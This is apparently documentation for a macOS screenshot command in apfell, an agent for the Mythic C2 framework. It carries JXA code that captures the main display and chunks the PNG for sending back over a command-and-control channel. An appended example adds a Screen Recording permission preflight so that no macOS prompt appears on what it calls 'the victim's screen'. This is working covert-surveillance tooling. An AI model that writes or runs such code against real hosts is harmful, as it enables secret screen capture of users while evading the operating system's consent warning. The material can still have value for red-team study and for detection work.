Summary
Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel.
- Needs Admin: False
- Version: 1
- Author: @its_a_feature_
In Catalina+ (10.15+) this is gated by the Screen Recording TCC permission, so be careful: the first capture attempt by a process that has not been granted it pops a "would like to record this computer's screen" prompt to the user, and until the grant exists the returned image contains only the desktop wallpaper and menu bar, not window contents.
Arguments
Usage
MITRE ATT&CK Mapping
Detailed Summary
This uses API calls to read the current screen and return it to Mythic. It currently captures only the main display (the one returned by CGMainDisplayID), not every attached screen.
ObjC.import('Cocoa'); // Foundation/AppKit plus the CoreGraphics CGDisplay* symbols used below

// CGDisplayCreateImage returns a CGImageRef of the main display only
let cgimage = $.CGDisplayCreateImage($.CGMainDisplayID());
if(cgimage.js === undefined) {
    cgimage = $.CFMakeCollectable(cgimage); // in case 10.15 is messing with the types again
}
if(cgimage.js === undefined){
    return {"user_output":"Failed to get image from display", "completed": true, "status": "error"};
}
// Wrap the CGImage in a bitmap rep so AppKit can serialize it as PNG
let bitmapimagerep = $.NSBitmapImageRep.alloc.initWithCGImage(cgimage);
let capture = bitmapimagerep.representationUsingTypeProperties($.NSBitmapImageFileTypePNG, Ref());
The screen capture is chunked and sent back to Mythic.
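The following is an added JXA example, not apfell's own screenshot command, showing the full flow described above with the two practical checks an operator wants: a preflight for the Screen Recording grant so the TCC prompt is never triggered on a Catalina+ host, and the base64 chunking before the PNG goes back over C2. It assumes CGPreflightScreenCaptureAccess (CoreGraphics, 10.15+) is callable once bound with ObjC.bindFunction, and the 512 KiB chunk size is an arbitrary choice. Run it with osascript -l JavaScript.

```jxa
// Added example (not apfell's own code): capture the main display as PNG only if
// Screen Recording has already been granted, then base64-chunk the bytes for C2.
ObjC.import('Cocoa'); // Foundation/AppKit plus the CoreGraphics symbols used below

// Pre-Catalina hosts have no Screen Recording TCC category, so nothing to preflight.
function hostHasScreenRecordingTCC() {
    let v = $.NSProcessInfo.processInfo.operatingSystemVersion;
    return v.majorVersion > 10 || (v.majorVersion === 10 && v.minorVersion >= 15);
}

// Assumption: CGPreflightScreenCaptureAccess is reachable through the bridge once
// bound explicitly. It reports whether this process already holds the grant WITHOUT
// showing the prompt, unlike CGRequestScreenCaptureAccess or the first capture call.
function screenRecordingGranted() {
    if (!hostHasScreenRecordingTCC()) {
        return true;
    }
    ObjC.bindFunction('CGPreflightScreenCaptureAccess', ['bool', []]);
    return $.CGPreflightScreenCaptureAccess();
}

// Same API chain as the command: CGDisplayCreateImage -> NSBitmapImageRep -> PNG NSData.
function captureMainDisplayPNG() {
    let cgimage = $.CGDisplayCreateImage($.CGMainDisplayID());
    if (cgimage.js === undefined) {
        cgimage = $.CFMakeCollectable(cgimage); // 10.15 type quirk, as in the command above
    }
    if (cgimage.js === undefined) {
        return null;
    }
    let rep = $.NSBitmapImageRep.alloc.initWithCGImage(cgimage);
    // Empty properties dictionary; PNG encoding needs no options.
    return rep.representationUsingTypeProperties($.NSBitmapImageFileTypePNG, $.NSDictionary.dictionary);
}

// Split the base64 string into fixed-size pieces for transport.
function chunkString(s, chunkSize) {
    let chunks = [];
    for (let i = 0; i < s.length; i += chunkSize) {
        chunks.push(s.slice(i, i + chunkSize));
    }
    return chunks;
}

function screenshot(chunkSize) {
    if (!screenRecordingGranted()) {
        // Bail out rather than pop the TCC dialog on the user's screen.
        return {"user_output": "Screen Recording not granted to this process; skipping to avoid TCC prompt",
                "completed": true, "status": "error"};
    }
    let png = captureMainDisplayPNG();
    if (png === null) {
        return {"user_output": "Failed to get image from display", "completed": true, "status": "error"};
    }
    let b64 = png.base64EncodedStringWithOptions(0).js;
    let chunks = chunkString(b64, chunkSize);
    return {"user_output": "captured " + png.length + " bytes in " + chunks.length + " chunks",
            "chunks": chunks, "completed": true, "status": "success"};
}

screenshot(512 * 1024); // chunk size is an arbitrary assumption
```

The preflight is the only reliable way to tell a blocked capture from a real one: without the grant CGDisplayCreateImage still succeeds and hands back a wallpaper-only image, so checking the return value alone would both miss the problem and leave a prompt on the victim's screen.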